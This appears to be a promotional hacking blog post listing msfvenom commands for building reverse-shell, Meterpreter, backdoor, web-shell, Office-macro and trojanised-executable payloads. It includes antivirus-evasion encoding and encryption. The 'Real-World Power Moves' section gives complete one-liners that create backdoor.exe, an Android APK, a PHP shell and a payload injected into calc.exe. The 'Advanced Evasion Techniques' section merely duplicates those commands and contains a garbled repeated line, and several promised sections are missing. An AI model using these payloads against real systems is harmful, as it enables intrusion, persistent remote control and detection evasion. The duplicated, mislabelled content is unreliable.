Master msfvenom in 2025: Top 100 Commands Every Hacker Needs – With Bonus Payload Generation Cheat Sheet
msfvenom is the ultimate payload generator dominating penetration testing in 2025. As a core component of Metasploit, it offers unmatched flexibility for creating custom payloads to exploit vulnerabilities. This article delivers 100 essential msfvenom commands, paired with a bonus cheat sheet to supercharge your hacking skills.
Why msfvenom Rules in 2025
msfvenom, part of the Metasploit Framework by Rapid7, excels at generating payloads for any platform, with advanced encoding and evasion techniques. In 2025, its ability to craft stealthy, targeted payloads makes it a non-negotiable tool for ethical hackers and red teamers.
Table of Contents
- Basic Payload Generation
- Encoding and Evasion
- Output Formats
- Platform-Specific Payloads
- Advanced Evasion Techniques
- Integration and Automation
- Real-World Power Moves
- Bonus Payload Generation Cheat Sheet
- Pro Tips for msfvenom Masters
Basic Payload Generation
| Command | Description |
|---|---|
| msfvenom -p windows/shell/reverse_tcp | Generate Windows reverse TCP shell payload |
| msfvenom -l payloads | List all available payloads |
| msfvenom -f exe | Output payload as executable file |
| msfvenom -a x86 | Set architecture to x86 |
| msfvenom -a x64 | Set architecture to x64 |
| msfvenom -o output.exe | Save payload to file (e.g., output.exe) |
| msfvenom –platform windows | Set platform to Windows |
| msfvenom –platform linux | Set platform to Linux |
| msfvenom -p linux/x86/shell/reverse_tcp | Generate Linux reverse TCP shell payload |
| msfvenom LHOST=192.168.1.1 | Set local host IP for reverse connection |
| msfvenom LPORT=4444 | Set local port for reverse connection |
| msfvenom -h | Display help for msfvenom options |
| msfvenom –list platforms | List supported platforms |
| msfvenom –list formats | List supported output formats |
| msfvenom –list archs | List supported architectures |
| msfvenom -p windows/meterpreter/reverse_tcp | Generate Windows Meterpreter payload |
| msfvenom -f raw | Output payload in raw format |
| msfvenom -k | Keep template executable alive (for -x option) |
| msfvenom –smallest | Generate the smallest possible payload |
| msfvenom –help-formats | Show detailed help for output formats |
Encoding and Evasion
| Command | Description |
|---|---|
| msfvenom -e x86/shikata_ga_nai | Encode with Shikata Ga Nai encoder |
| msfvenom -i 3 | Encode payload 3 times |
| msfvenom -b “\x00” | Avoid null bytes in payload |
| msfvenom -b “\x00\x0a” | Avoid multiple bad characters (e.g., null and newline) |
| msfvenom -e x86/fnstenv_mov | Encode with fnstenv_mov encoder |
| msfvenom -e x86/jmp_call_additive | Encode with jmp_call_additive encoder |
| msfvenom -e x86/call4_dword_xor | Encode with call4_dword_xor encoder |
| msfvenom -e x86/countdown | Encode with countdown encoder |
| msfvenom –list encoders | List all available encoders |
| msfvenom –encoder-space 100 | Set maximum space for encoder (e.g., 100 bytes) |
| msfvenom –bad-chars “\x00\x0d” | Specify bad characters to avoid |
| msfvenom –iterations 5 | Set number of encoding iterations to 5 |
| msfvenom -e generic/none | Use no encoding (raw payload) |
| msfvenom –encoder x86/shikata_ga_nai | Specify encoder by full name |
| msfvenom –nopsled 32 | Add 32 NOPs before payload for stability |
| msfvenom –space 200 | Limit payload size to 200 bytes |
| msfvenom –noinject | Prevent automatic injection into template |
| msfvenom –template template.exe | Use a custom template for payload injection |
| msfvenom –keep | Preserve template functionality after injection |
| msfvenom –list-options | Show advanced options for selected payload |
Output Formats
| Command | Description |
|---|---|
| msfvenom -f c | Output payload in C format |
| msfvenom -f python | Output payload in Python format |
| msfvenom -f ruby | Output payload in Ruby format |
| msfvenom -f perl | Output payload in Perl format |
| msfvenom -f java | Output payload in Java format |
| msfvenom -f dll | Output payload as DLL file |
| msfvenom -f elf | Output payload as ELF file (Linux) |
| msfvenom -f macho | Output payload as Mach-O file (macOS) |
| msfvenom -f jar | Output payload as JAR file |
| msfvenom -f war | Output payload as WAR file for Java web apps |
| msfvenom -f asp | Output payload as ASP file |
| msfvenom -f aspx | Output payload as ASPX file |
| msfvenom -f psh | Output payload in PowerShell format |
| msfvenom -f vba | Output payload in VBA format for Office macros |
| msfvenom -f vbs | Output payload in VBScript format |
Platform-Specific Payloads
| Command | Description |
|---|---|
| msfvenom -p windows/x64/meterpreter/reverse_tcp | Windows x64 Meterpreter payload |
| msfvenom -p linux/x64/shell/reverse_tcp | Linux x64 reverse shell payload |
| msfvenom -p osx/x64/shell_reverse_tcp | macOS x64 reverse shell payload |
| msfvenom -p android/meterpreter/reverse_tcp | Android Meterpreter payload |
| msfvenom -p java/meterpreter/reverse_tcp | Java Meterpreter payload |
| msfvenom -p php/meterpreter/reverse_tcp | PHP Meterpreter payload |
| msfvenom -p python/meterpreter/reverse_tcp | Python Meterpreter payload |
| msfvenom -p nodejs/shell_reverse_tcp | Node.js reverse shell payload |
| msfvenom -p cmd/windows/reverse_powershell | Windows PowerShell reverse shell |
| msfvenom -p bsd/x86/shell/reverse_tcp | BSD x86 reverse shell payload |
| msfvenom -p solaris/x86/shell_reverse_tcp | Solaris x86 reverse shell payload |
| msfvenom -p aix/ppc/shell_reverse_tcp | AIX PPC reverse shell payload |
| msfvenom -p hpux/ppc/shell_reverse_tcp | HP-UX PPC reverse shell payload |
| msfvenom -p windows/x86/shell/bind_tcp | Windows x86 bind shell payload |
| msfvenom -p linux/armle/shell_reverse_tcp | Linux ARM reverse shell payload |
| msfvenom -p osx/arm64/shell_reverse_tcp | macOS ARM64 reverse shell payload |
| msfvenom -p android/shell/reverse_http | Android reverse HTTP shell payload |
| msfvenom -p java/shell/reverse_tcp | Java reverse shell payload |
| msfvenom -p php/shell_findsock | PHP findsock shell payload |
| msfvenom -p python/shell_reverse_tcp | Python reverse shell payload |
Real-World Power Moves
- Windows Backdoor:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.1 LPORT=4444 -f exe -o backdoor.exe– Create a Windows Meterpreter backdoor. - Linux Reverse Shell:
msfvenom -p linux/x64/shell/reverse_tcp LHOST=192.168.1.1 LPORT=4444 -f elf -o shell.elf– Generate a Linux reverse shell. - Android Payload:
msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.1 LPORT=4444 -f apk -o app.apk– Build an Android Meterpreter payload. - PHP Web Shell:
msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.1.1 LPORT=4444 -f raw -o shell.php– Create a PHP web shell. - Java Payload:
msfvenom -p java/meterpreter/reverse_tcp LHOST=192.168.1.1 LPORT=4444 -f jar -o app.jar– Generate a Java Meterpreter payload. - PowerShell Payload:
msfvenom -p cmd/windows/reverse_powershell LHOST=192.168.1.1 LPORT=4444 -f psh -o script.ps1– Create a PowerShell reverse shell. - Encoded Payload:
msfvenom -p windows/shell/reverse_tcp LHOST=192.168.1.1 LPORT=4444 -e x86/shikata_ga_nai -i 3 -f exe -o encoded.exe– Encode a Windows payload for evasion. - Avoid Null Bytes:
msfvenom -p linux/x86/shell/reverse_tcp LHOST=192.168.1.1 LPORT=4444 -b "\x00" -f elf -o safe.elf– Generate a Linux payload without null bytes. - C Output:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.1 LPORT=4444 -f c -o shellcode.c– Output a payload in C format. - Python Output:
msfvenom -p python/meterpreter/reverse_tcp LHOST=192.168.1.1 LPORT=4444 -f py -o shell.py– Output a Python Meterpreter payload. - VBA Macro:
msfvenom -p windows/shell/reverse_tcp LHOST=192.168.1.1 LPORT=4444 -f vba -o macro.vba– Create a VBA payload for Office macros. - Encrypted Payload:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.1 LPORT=4444 --encrypt aes256 -f exe -o secure.exe– Encrypt a payload with AES-256. - Template Injection:
msfvenom -p windows/shell/reverse_tcp LHOST=192.168.1.1 LPORT=4444 --template calc.exe -f exe -o calc_backdoor.exe– Inject payload into calc.exe. - Base64 Output:
msfvenom -p python/shell/reverse_tcp LHOST=192.168.1.1 LPORT=4444 -f py | base64– Encode a Python payload in Base64. - PowerShell Execution:
msfvenom -p cmd/windows/reverse_powershell LHOST=192.168.1.1 LPORT=4444 -f psh | powershell -EncodedCommand– Run a PowerShell payload directly.
Advanced Evasion Techniques
- Windows Backdoor:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.1 LPORT=4444 -f exe -o backdoor.exe– Create a Windows Meterpreter backdoor. - Linux Reverse Shell:
msfvenom -p linux/x64/shell/reverse_tcp LHOST=192.168.1.1 LPORT=4444 -f elf -o shell.elf– Generate a Linux reverse shell. - Android Payload:
msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.1 LPORT=4444 -f apk -o app.apk– Build an Android Meterpreter payload. - PHP Web Shell:
msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.1.1 LPORT=4444 -f raw -o shell.php– Create a PHP web shell. - Java Payload:
msfvenom -p java/meterpreter/reverse_tcp LHOST=192.168.1.1 LPORT=4444 -f jar -o app.jar– Generate a Java Meterpreter payload. - PowerShell Payload:
msfvenom -p cmd/windows/reverse_powershell LHOST=192.168.1.1 LPORT=4444 -f psh -o script.ps1– Create a PowerShell reverse shell. - Encoded Payload:
msfvenom -p windows/shell/reverse_tcp LHOST=192.168.1.1 LPORT=4444 -e x86/shikata_ga_nai -i 3 -f exe -o encoded.exe– Encode a Windows payload for evasion. - Avoid Null Bytes:
msfvenom -p linux/x86/shell/reverse_tcp LHOST=192.168.1.1 LPORT=4444 -b "\x00" -f elf -o safe.elf– Generate a Linux payload without null bytes. - C Output:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.1 LPORT=4444 -f c -o shellcode.c– Output a payload in C format. - `Python Output: msfvenom -p python/meterpreter/reverse_tcp LHOST=192.168.1.1 LPORT=4444 -f py -o shell.py – Output a Python Meterpreter payload.
Python Output: msfvenom -p python/meterpreter/reverse_tcp LHOST=192.168.1.1 LPORT=4444 -f py -o shell.py– Output a Python Meterpreter payload. - VBA Macro:
msfvenom -p windows/shell/reverse_tcp LHOST=192.168.1.1 LPORT=4444 -f vba -o macro.vba– Create a VBA payload for Office macros. - Encrypted Payload:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.1 LPORT=4444 --encrypt aes256 -f exe -o secure.exe– Encrypt a payload with AES-256. - Template Injection:
msfvenom -p windows/shell/reverse_tcp LHOST=192.168.1.1 LPORT=4444 --template calc.exe -f exe -o calc_backdoor.exe– Inject payload into calc.exe. - Base64 Output:
msfvenom -p python/shell/reverse_tcp LHOST=192.168.1.1 LPORT=4444 -f py| base64 – Encode a Python payload in Base64. - PowerShell Execution:
msfvenom -p cmd/windows/reverse_powershell LHOST=192.168.1.1 LPORT=4444 -f psh | powershell -EncodedCommand– Run a PowerShell payload directly.
Bonus Payload Generation Cheat Sheet
Boost your msfvenom skills with these tools:
- Metasploit: Full exploitation framework.
- Burp Suite: Web app testing.
- Wireshark: Packet analysis. Find more at SquidHacker.com.
Pro Tips for msfvenom Masters
- Test Safely: Use legal labs like Hack The Box.
- Combine Tools: Pair with Metasploit for full attack chains.
- Stay Ethical: Skills for authorized use only.
- Optimize Evasion: Use –iterations and –bad-chars to bypass detection.
- Check Payloads: Verify compatibility with target systems.
Conclusion
msfvenom’s 100 commands give you the edge in payload generation for 2025. From basic shells to advanced evasion, this guide equips you to dominate penetration testing. Use it ethically, keep learning, and follow SquidHacker.com for more hardcore cybersecurity intel. Share this cheat sheet and own the hacking game!